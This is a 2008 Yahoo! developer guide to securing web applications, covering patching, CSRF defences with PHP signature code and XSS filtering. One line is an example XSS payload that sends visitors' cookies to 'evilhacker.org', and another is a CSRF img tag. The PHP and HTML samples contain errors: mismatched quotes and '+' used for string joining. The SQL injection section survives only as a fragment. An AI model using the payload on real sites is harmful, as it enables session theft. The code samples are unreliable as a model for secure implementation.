Yahoo! treats the security of our users' personal data very seriously, and we hope that our developers will do the same. Here are some guidelines to help you protect your users' trust in your application
The first step in protecting user data is to ensure that your systems are kept current with security patches. If you do not operate your own dedicated servers, then please ask your hosting provider if they keep their systems up-to-date.
Be sure that the services that are exposed to the Internet are only the ones your users need to access.
Most of the cases of user data making its way into the wrong hands stems from application bugs or security holes. Here are some basic guidelines for building safe internet applications:
mysql_real_escape_string() that will prevent most attacks of this type.
Ensure that requests coming in to your application originated from your application.
Let's say you have an application that manages a user's photos. If your application provides a function to delete a user's photos (e.g. "http://myapp.org/delete_photos.php"), an attacker could embed the same URL into his web page, such as <img src="http://myapp.org/delete_photos.php">. If one of your users visited the attacker's page, your user's photos would be wiped out.
Here are some ways of ensuring that requests to your application have come from your application:
Append a user-specific signature to the end of URLs to your applicaion.
<?php $delete_signature = md5($username . "xyz123_delete_photos"); ?> <!-- signed link --> <a href="/delete_photos.php?signature=<?php echo $delete_signature; ?>'>Delete Photos</a>
Before taking any action on behalf of the user, check that the "sig" argument is correct by performing the same hashing operation.
<?php
$delete_signature = md5($username . "xyz123_delete_photos");
if ($_GET['signature'] === $delete_signature) {
// proceed with delete operation
// ...
} else {
// this is a problem
// ...
}
?>
If your development framework supports a user session container (e.g. PHP), then generate a unique signature with a timestamp and store it in the session with each request, and embed it in your forms/URLs so that it is passed back to the server with subsequent requests. Only take action on behalf of the user if the signatures match, and a certain amount of time has not passed.
<?php $_SESSION['signature'] = md5(uniqid(rand(), true) + $username); $_SESSION['signature_timestamp'] = time(); ?> <!-- signed link --> <a href="/delete_photos.php?signature=<?php echo $_SESSION['signature']; ?>'>Delete Photos</a> <!-- signed form --> <form method="POST' action="/edit_photos.php'> <input type="hidden' name="signature' value="<?php echo $_SESSION['signature']; ?>'/> <input type="text' name="search' /> <input type="submit' /> </form>
In cases where you accept input from one user and display it back to another user, you need to ensure the first user cannot steal information from the second user.
For example, if you have a guestbook application where users may enter comments for others to view, an attacker could leave a comment like the following:
Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script>
This example will send a user's cookies for your site to the server waiting at evilhacker.org. To protect against this kind of attack, check all user input against strictly defined rules about what characters are allowed. Use whitelists ("only allow these characters") to filter user input. In most cases, the < and > characters do not need to be accepted.
Copyright © 2008 Yahoo! Inc. All rights reserved.
Privacy Policy - Terms of Service - Copyright Policy - Job Openings